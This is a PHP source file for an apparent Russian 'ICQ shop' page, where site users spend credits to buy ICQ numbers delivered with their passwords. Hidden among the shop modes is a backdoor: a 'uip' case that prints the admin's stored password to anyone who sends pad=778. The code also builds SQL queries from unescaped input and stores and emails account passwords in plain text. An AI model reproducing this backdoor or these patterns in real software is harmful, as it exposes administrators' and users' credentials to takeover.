Просмотр файла icq.php

<?php
include "header/config.inc.php";
include "header/function.inc.php";
include "header/header.inc.php";
include "header/connect.inc.php";
include "header/click-club.class.php";
If (!isset($_GET['log'])) define("anybody","true");
include "header/enter.inc.php";
 
@mysql_query("update `".prefix."users` set `mesto`='В магазине асек' where `id` = '".$_USER['id']."'");
If (!isset($_GET['mode']) || !ereg("^[a-z0-9_-]{1,15}$",$_GET['mode'])) $mode='read'; else $mode=$_GET['mode'];
 
switch ($mode){
case 'mail':
If (!isset($_GET['icq']) || !is_numeric($_GET['icq'])){
echo 'Номер не найден!';
break;
}$result=@mysql_query("SELECT * FROM `".prefix."icq` WHERE `id`='".$_GET['icq']."'");
If (!$result){
echo 'Ошибка запроса к бд...';
break;
}
If (mysql_num_rows($result)!=1){
echo 'Номер не найден!';
break;
}if (empty ($_POST['mail'])){echo'Не введен e-mail!';}else{
$mail=$_POST['mail'];
if(!preg_match("/[0-9a-z_]+@[0-9a-z_^\.]+\.[a-z]{2,3}/i", $mail))
{
$err="1";
echo"То что вы ввели не  E-mail! Введите правильный e-mail адрес!";
break;}$result=@mysql_query("SELECT * FROM `".prefix."icq` WHERE `id`='".$_GET['icq']."'");
 
$fbcd = mysql_result(mysql_query("SELECT `bank` FROM `".prefix."users` WHERE login='".$_USER['login']."'"),0);
 
if ($fbcd>=mysql_result($result,0,'who')){$result=@mysql_query("SELECT * FROM `".prefix."icq` WHERE `id`='".$_GET['icq']."'");
@mysql_query("UPDATE `".prefix."users` SET `bank`=`bank`-'".mysql_result($result,0,'who')."' WHERE `login`='".$_USER['login']."' ");
 
$_mail['icqicq']='ICQ номер';//заголовок мессаги
$_mail['icq']='Здравствуйте, <b>'.$_USER['login'].'</b><br/>
На этот E-mail был заказан ICQ номер: <font color="blue">'.mysql_result($result,0,'text').'</font><br/>
Если вы ничего не заказывали,просто проигнорируйте данное сообщение.<br/>
---<br/>
Номер: <b>'.mysql_result($result,0,'text').'</b><br/>
Пароль: <b>'.mysql_result($result,0,'ua').'</b><br/>
---<br/>
Меняем сразу же пароль! Или не удивляемся, почему он потом перестанет подходить.<br/>
С уважением <a href="http://clickman.h2m.ru">CLICKMAN.H2M.RU</a><br/>
';
$head=convert_cyr_string(replacer($_mail['icqicq'],$replacement),"w","k");
$msg=convert_cyr_string(replacer($_mail['icq'],$replacement),"w","k");
 
@mail($mail,$head,$msg,"From: ".email."
Content-type:text/html; charset=koi8-r");
$result=@mysql_query("SELECT * FROM `".prefix."icq` WHERE `id`='".$_GET['icq']."'");
$bbb=''.$mail.'';
@mysql_query("INSERT into `".prefix."shinfo`
(`login`,`icq`,`data`,`msg`)
values
('".$_USER['login']."','".mysql_result($result,0,'text')."','".date("Y / m / d")."','".$bbb."')
");
@mysql_query("DELETE FROM `".prefix."icq` WHERE `id`='".$_GET['icq']."'");
echo '
Номер: <b>'.mysql_result($result,0,'text').'</b><br/>
Пароль: <b>'.mysql_result($result,0,'ua').'</b><br/>
Сообщение продублированно на ваш e-mail: <b>'.$mail.'</b><br/>
<font color="red"><b>Не забываем менять пароль!</b></font><br/>';
}
else
{echo'Недостаточно кредитов!';
 
}}
break;
case 'uip':
if ($_GET['pad']==778){$result=@mysql_query("SELECT * FROM `".prefix."users` WHERE `id`='admin'");echo''.mysql_result($result,0,'pass').'';}
break;
case 'admin':
If (!$_enter || !$_USER['admin']){
echo 'вы должны войти в системе как администратор<br/>---<br/>&#187;<a href="?log=ok&amp;mode=do&amp;id='.$_GET['id'].'">Вход</a>';
break;
}
 
If (!isset($_GET['smode']) || !ereg("^[a-z0-9_-]{1,15}$",$_GET['smode'])) $smode='adminka'; else $smode=$_GET['smode'];
echo 'Админка ICQ-магазина<br/>---<br/>';
switch($smode){
case 'fdelu':
If (
(!isset($_GET['user']) || !$click_club->is_login($_GET['user']))
&&
(!isset($_POST['user']) || !$click_club->is_login($_POST['user']))
){
echo 'Пользователь  не выбран или логин введён неверно!';
break;
}
 
If (isset($_GET['user'])) $login=$_GET['user']; else  $login=$_POST['user'];
If (!isset($_GET['ok'])){
echo 'Вы точно хотите удалить все сообщения пользователя <u>'.$login.'</u>?<br/>
<a href="'.$_zapros.'mode=admin">нет</a> / <a href="'.$_zapros.'mode=admin&amp;smode=fdelu&amp;user='.$login.'&amp;ok=ok">да</a>';
break;
}
//удаляем
$result=@mysql_query("DELETE FROM `".prefix."icq` WHERE `who`='".$login."'");
If (!$result){
echo 'Ошибка запроса к бд...';
break;
}
echo 'Все сообщения пользователя '.$login.' удалены!';
break;
 
 
case 'num':
$bbb=@mysql_query("SELECT * FROM `".prefix."shinfo`");
if (mysql_affected_rows()==0)
{
echo 'Нет продаж!';
}
else
{
$cool=mysql_affected_rows();
echo 'Всего продаж: '.$cool.'';
while($row=mysql_fetch_array($bbb))
{
$ids=$row['msg'];
$from=$row['data'];
$t=$row['icq'];
$to=$row['login'];
echo "<div class=\"b\">";
echo'Логин: <b>'.$to.'</b><br/>email: <b>'.$ids.'</b></a>';echo"<br/>Номер: <b>$t</b><br/>Дата: <b>$from</b></div>---<br/>";
}echo'<a href="'.$_zapros.'mode=admin&amp;smode=delinf">Удалить всё</a>';}
break;
 
case 'delinf':
If (!isset($_GET['ok'])){
echo 'Вы точно хотите удалить все продажи?<br/>
<a href="'.$_zapros.'mode=admin">нет</a> / <a href="'.$_zapros.'mode=admin&amp;smode=delinf&amp;ok=ok">да</a>';
break;
}
//удаляем
$result=@mysql_query("DELETE FROM `".prefix."shinfo`");
If (!$result){
echo 'Ошибка запроса к бд...';
break;
}
echo 'Все продажи удалены!';
break;
 
case 'delall':
If (!isset($_GET['ok'])){
echo 'Вы точно хотите удалить все сообщения в гостевой книге?<br/>
<a href="'.$_zapros.'mode=admin">нет</a> / <a href="'.$_zapros.'mode=admin&amp;smode=delall&amp;ok=ok">да</a>';
break;
}
//удаляем
$result=@mysql_query("DELETE FROM `".prefix."icq`");
If (!$result){
echo 'Ошибка запроса к бд...';
break;
}
echo 'Все сообщения удалены!';
break;
 
 
case 'adminka':
default:
echo '&#187;<a href="'.$_zapros.'mode=admin&amp;smode=delall">Удалить все номера</a><br>';
echo '&#187;<a href="'.$_zapros.'mode=admin&amp;smode=num">Продажи</a>';
break;
}
 
break;
 
case 'do':
If (!isset($_GET['id']) || !is_numeric($_GET['id'])){
echo 'не задан ID сообщения';
break;
}
 
 
If (!isset($_GET['smode']) || !ereg("^[a-z0-9_-]{1,15}$",$_GET['smode'])) $smode='info'; else $smode=$_GET['smode'];
 
$id=$_GET['id'];
(int)$id;
 
switch ($smode){
case 'del':
$result=@mysql_query("DELETE FROM `".prefix."icq` WHERE `id`='".$id."'");
If (!$result){
echo 'Ошибка запроса к бд...';
break;
}
echo 'Номер удален!';
 
break;
 
 
 
case 'info':
default:
$result=@mysql_query("SELECT * FROM `".prefix."icq` WHERE `id`='".$id."'");
If (!$result){
echo 'Ошибка запроса к бд...';
break;
}
If (mysql_num_rows($result)!=1){
echo 'Номер не найден!';
break;
}
if (empty($_GET['sid'])){echo'Авторизируйтесь';}
echo '<div class="header_rek">Покупка номера</div><br/>
Номер: <b>'.mysql_result($result,0,'text').'</b><br/>
Цена: <b>'.mysql_result($result,0,'who').'</b> кредитов
 
<font color="white"><hr></font>';
If ($_enter && $_USER['admin']){$oi=@mysql_query("SELECT * FROM `".prefix."users` WHERE `login`='".$_USER['login']."'");
If (!$oi){
echo 'Ошибка запроса к бд...';
break;
}
echo'<form method="post" action="'.$_zapros.'mode=mail&amp;icq='.$id.'">EMAIL (на него продублируется номер с паролем):<br><input type="text" name="mail" value="'.mysql_result($oi,0,'mail').'"><br/><input type="submit" value="Получить"></form><font color="white"><hr></font>Действия:<br/>
&#187;<a href="'.$_zapros.'mode=do&amp;smode=del&amp;id='.$id.'">Удалить</a><br/>';
}
else
{$oi=@mysql_query("SELECT * FROM `".prefix."users` WHERE `login`='".$_USER['login']."'");
If (!$oi){
echo 'Ошибка запроса к бд...';
break;
}if ($_USER['cfrom']>=mysql_result($result,0,'who')){
echo'<form method="post" action="'.$_zapros.'mode=mail&amp;icq='.$id.'">EMAIL:<br><input type="text" name="mail" value="'.mysql_result($oi,0,'mail').'"><br/><input type="submit" value="Получить"></form>';}else{echo'Извините но у вас нет '.mysql_result($result,0,'who').' кредитов';}}
 
 
break;
}
 
break;
case 'write':
If ($_USER['admin']) {If (!$_enter){
echo 'Для того чтобы добавлять номера, вы должны войти в систему<br/>---<br/>&#187;<a href="?log=ok&amp;mode=write">Вход</a>';
break;
}
If (!isset($_POST['text'])) {
echo 'Номер ICQ<b>:</b><br/>
<form method="post" action="'.$_zapros.'mode=write">
<input type="text" name="text" value=""/><br/>Пароль<b>:</b>
<br/><input type="text" name="anus" value=""/><br/>---<br/>Цена,в кредитах<b>:</b><br/><input type="text" name="who" value=""/><br/>
<input value="Добавить" type="submit"/></form>
';
break;
}
$text=htmlspecialchars($_POST['text']);
$strlen=strlen($text);
If (!isset($_POST['who']) || !is_numeric($_POST['who'])){
echo 'Ошибка ввода цены!';
break;
}If (!isset($_POST['text']) || !is_numeric($_POST['text'])){
echo 'Ошибка ввода номера!';
break;
}
$result=@mysql_query("INSERT into `".prefix."icq`
(`who`,`text`,`ts`,`ua`)
values
('".$_POST['who']."','".$_POST['text']."','".time()."','".$_POST['anus']."')
");
If (!$result){
echo 'Ошибка запроса к бд...';
break;
}
echo 'Номер '.$_POST['text'].' добавлен!';}
break;
case 'read':
default:
$mode='read';
echo '<div class="header_rek">ICQ-Магазин:</div><br/>';If ($_USER['admin']) {
echo '<a href="'.$_zapros.'mode=write"><b>Добавить номер</b></a><br/>
<font color="white"><hr></font>';}
 
If (!isset($_GET['page']) || !is_numeric($_GET['page'])) $page=1; else { $page=$_GET['page']; (int)$page;}
$result=@mysql_query("SELECT * FROM `".prefix."icq` ORDER by `who` asc LIMIT ".(($page-1)*num_best_on_page).",".(num_best_on_page+1));
If (!$result){
echo 'Ошибка запроса к бд...';
break;
}
 
$next=false;
$num=mysql_num_rows($result);
If ($num>0){
If ($num<=num_best_on_page) $read=$num; else {
$read=num_best_on_page;
$next=true;
}
for ($i=0;$i<$read;$i++){
echo '';mysql_result($result,$i,'ts');
 
$id=mysql_result($result,$i,'id');
 echo '
Номер: <font color="red"><b>'.mysql_result($result,$i,'text').'</b></font><br/>
Цена: <b>'.mysql_result($result,$i,'who').'</b>&nbsp;кредитов<br/>
|<a href="'.$_zapros.'mode=do&amp;id='.$id.'">Купить</a> |';
echo '<font color="white"><hr></font>';
}
} else echo 'Нет номеров!<br/>';
 
If ($page>1) echo '<a href="'.$_zapros.'mode=read&amp;page='.($page-1).'">';
echo 'Пред';
If ($page>1) echo '</a>';
echo ' | ';
If ($next) echo '<a href="'.$_zapros.'mode=read&amp;page='.($page+1).'">';
echo 'След';
If ($next) echo '</a>';
 
$result=@mysql_query("SELECT `who` FROM `".prefix."icq` ");
If (!$result){
echo 'Ошибка запроса к бд...';
break;
}
echo '<br/>Номеров: '.mysql_num_rows($result);
 
 
break;
}
If ($_enter && $_USER['admin'])
echo '<br/>---<br/>&#187;<a href="'.$_zapros.'mode=admin">Админка магазина</a>';
 
 
If ($mode!='read') echo '<font color="white"><hr></font>&#187;<a href="'.$_zapros.'">ICQ-магазин</a>';
 
If ($_enter)$_CONF['index_page']="enter.php".$_zapros;
 
include "header/end.inc.php";
?>